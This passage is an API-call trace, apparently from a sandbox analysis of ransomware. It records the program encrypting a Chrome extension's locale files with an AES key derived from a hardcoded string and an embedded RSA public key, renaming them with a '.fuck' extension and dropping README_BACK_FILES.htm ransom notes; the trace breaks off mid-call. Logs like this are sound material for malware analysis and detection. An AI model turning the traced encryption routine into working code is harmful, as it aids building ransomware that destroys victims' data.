(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.315] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.315] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.317] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.317] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.317] CryptHashData (hHash=0x2e18128, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.318] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.318] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.318] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.318] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e165a0) returned 1 [0257.318] CryptImportPublicKeyInfo (in: hCryptProv=0x2e165a0, dwCertEncodingType=0x1, pInfo=0x2e2b9d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2ba00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2ba08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19aa8) returned 1 [0257.318] CryptEncrypt (in: hKey=0x2e19aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.318] CryptEncrypt (in: hKey=0x2e19aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15a78*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15a78*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.318] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e15a78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15a78*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.319] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x16a, lpOverlapped=0x0) returned 1 [0257.323] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x16a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x170) returned 1 [0257.323] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x170, lpOverlapped=0x0) returned 1 [0257.323] CloseHandle (hObject=0x5d60) returned 1 [0257.323] CloseHandle (hObject=0x5d5c) returned 1 [0257.323] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json"), bFailIfExists=0) returned 1 [0257.326] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json", dwFileAttributes=0x0) returned 1 [0257.327] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json.gsg")) returned 1 [0257.328] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json.fuck")) returned 1 [0257.329] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.329] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.329] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.329] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.329] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.329] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\readme_back_files.htm")) returned 0xffffffff [0257.329] AreFileApisANSI () returned 1 [0257.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.329] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.330] GetFileType (hFile=0x5d50) returned 0x1 [0257.330] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.331] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.331] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.332] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.332] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.332] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.332] GetLastError () returned 0x0 [0257.332] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json")) returned 0x20 [0257.333] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0257.333] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.334] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.334] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.334] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.336] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.336] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.336] CryptHashData (hHash=0x2e18128, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.336] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.336] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.336] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.336] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16408) returned 1 [0257.337] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16408, dwCertEncodingType=0x1, pInfo=0x2e24e90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24ec0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24ec8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19e68) returned 1 [0257.337] CryptEncrypt (in: hKey=0x2e19e68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.337] CryptEncrypt (in: hKey=0x2e19e68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15858*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15858*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.337] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e15858*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15858*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.338] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xfb, lpOverlapped=0x0) returned 1 [0257.339] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xfb, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0257.339] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0257.339] CloseHandle (hObject=0x5d5c) returned 1 [0257.339] CloseHandle (hObject=0x5d60) returned 1 [0257.339] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0257.342] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0257.342] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json.gsg")) returned 1 [0257.343] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\messages.json.fuck")) returned 1 [0257.344] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.344] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.344] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.344] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.344] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.344] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0257.345] AreFileApisANSI () returned 1 [0257.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.345] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.345] GetFileType (hFile=0x5d50) returned 0x1 [0257.345] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.346] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.346] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.347] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.347] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.347] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.347] GetLastError () returned 0x0 [0257.347] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json")) returned 0x20 [0257.347] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json", dwFileAttributes=0x80) returned 1 [0257.347] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.348] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.351] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ka\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.351] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.354] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.354] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.354] CryptHashData (hHash=0x2e18128, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.354] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.354] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.354] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.354] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e160d8) returned 1 [0257.355] CryptImportPublicKeyInfo (in: hCryptProv=0x2e160d8, dwCertEncodingType=0x1, pInfo=0x2e252a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e252d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e252d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19ea8) returned 1 [0257.355] CryptEncrypt (in: hKey=0x2e19ea8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.355] CryptEncrypt (in: hKey=0x2e19ea8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15c98*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15c98*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.355] WriteFile (in: 